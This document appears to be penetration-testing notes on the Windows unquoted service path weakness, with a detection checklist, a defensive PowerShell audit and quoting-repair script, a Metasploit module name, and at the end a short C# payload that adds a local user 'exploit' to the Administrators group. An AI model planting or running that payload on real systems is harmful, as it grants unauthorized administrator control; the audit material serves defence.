Process
When a service is launched, the system calls CreateProcess with the service's binary path as the lpApplicationName parameter. If that path is not enclosed in quotes and contains spaces, the executable name is ambiguous: CreateProcess tries each space-delimited prefix in turn (for C:\Program Files\My App\svc.exe it first tries C:\Program.exe, then C:\Program Files\My.exe, and only then the intended binary), so a file planted at one of those earlier locations runs in place of the real service.
Detection
To see if the host is vulnerable we can:
- List the running services
- A service is a candidate when it has all of the following:
  - Start mode is Automatic
  - The binary path contains at least one space
  - The binary path is not enclosed in quotes
  - The service runs as Administrator or SYSTEM
  - The attacker has write permission on one of the directories along the service's path
cmd - wmic service get name,pathname,startmode
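The checklist above, turned into an audit script. This is an added example for this page, not code from the original notes or from any tool the notes mention. It enumerates services whose ImagePath is unquoted, contains whitespace and has an Automatic start mode, computes the directories that CreateProcess would consult for each space in the path, reports which of those are writable by low-privilege groups (the group list and the "writable" rights mask are assumptions a defender can adjust), and offers a remediation that rewrites the ImagePath with quotes. It assumes Windows PowerShell 5.1 or later; the remediation function needs an elevated prompt.

```powershell
# Added example: audit services for unquoted, space-containing paths and
# report which path directories are writable by non-privileged groups.
# Assumes Windows with PowerShell 5.1+, Get-CimInstance and Get-Acl available.

function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.PathName -notmatch '^"' -and   # not already quoted
            $_.PathName -match '\s' -and      # contains whitespace
            $_.StartMode -eq 'Auto'           # starts automatically
        } |
        ForEach-Object {
            # Keep the part up to and including the first ".exe" (drops arguments).
            # -split is case-insensitive, so ".EXE" is handled too.
            $exe = ($_.PathName -split '(?<=\.exe)', 2)[0]
            [pscustomobject]@{
                Name      = $_.Name
                StartName = $_.StartName      # account the service runs as
                PathName  = $_.PathName
                ImagePath = $exe
            }
        }
}

function Get-AmbiguousDirectory {
    # For every space in the image path, return the directory in which
    # CreateProcess would look for the truncated executable name.
    param([string]$ImagePath)
    $dirs = @()
    $idx = $ImagePath.IndexOf(' ')
    while ($idx -gt 0) {
        $prefix = $ImagePath.Substring(0, $idx)     # e.g. C:\Program Files\My
        $parent = Split-Path -Path $prefix -Parent  # e.g. C:\Program Files
        if ($parent -and $dirs -notcontains $parent) { $dirs += $parent }
        $idx = $ImagePath.IndexOf(' ', $idx + 1)
    }
    return $dirs
}

function Test-WritableByLowPrivilege {
    # Assumed list of principals that count as "low privilege"; extend as needed.
    param([string]$Directory)
    $lowPriv = @('Everyone', 'BUILTIN\Users',
                 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
    $writeBits = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                       [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
                       [System.Security.AccessControl.FileSystemRights]::Modify -bor
                       [System.Security.AccessControl.FileSystemRights]::FullControl)
    try { $acl = Get-Acl -LiteralPath $Directory -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $lowPriv -contains $ace.IdentityReference.Value -and
            (([int]$ace.FileSystemRights -band $writeBits) -ne 0)) {
            return $true
        }
    }
    return $false
}

function Invoke-UnquotedServicePathAudit {
    foreach ($svc in Get-UnquotedServicePath) {
        $weak = @(Get-AmbiguousDirectory -ImagePath $svc.ImagePath |
                  Where-Object { Test-WritableByLowPrivilege -Directory $_ })
        [pscustomobject]@{
            Service         = $svc.Name
            RunsAs          = $svc.StartName
            PathName        = $svc.PathName
            WritableByUsers = ($weak -join ';')
            AtRisk          = ($weak.Count -gt 0)
        }
    }
}

function Repair-ServicePathQuoting {
    # Remediation: wrap the executable part of ImagePath in quotes, keeping
    # any arguments and the existing registry value type. Requires admin.
    param([string]$Name)
    $key  = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    $item = Get-Item -Path $key
    $current = (Get-ItemProperty -Path $key -Name ImagePath).ImagePath
    if ($current -match '^"') { return $current }          # nothing to do
    $exe   = ($current -split '(?<=\.exe)', 2)[0]
    $rest  = $current.Substring($exe.Length)
    $fixed = "`"$exe`"$rest"
    Set-ItemProperty -Path $key -Name ImagePath -Value $fixed -Type $item.GetValueKind('ImagePath')
    return $fixed
}

# Usage: list candidate services, then quote the paths that were flagged.
Invoke-UnquotedServicePathAudit | Format-Table -AutoSize
# Invoke-UnquotedServicePathAudit | Where-Object AtRisk | ForEach-Object { Repair-ServicePathQuoting -Name $_.Service }
```

The audit reports every unquoted path, not only the ones with a weak directory ACL, because the quoting fix is cheap and a directory that is locked down today may not stay that way; the RunsAs column lets you prioritise services running as LocalSystem, which the checklist calls out as the ones that matter.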
Metasploit
exploit/windows/local/trusted_service_path
using System;

public class Program
{
    static public void Main()
    {
        // Runs "net localgroup Administrators exploit /add" through cmd.exe,
        // adding the local user "exploit" to the Administrators group.
        string strCmdText = " /C net localgroup Administrators exploit /add";
        System.Diagnostics.Process.Start("CMD.exe", strCmdText);
    }
}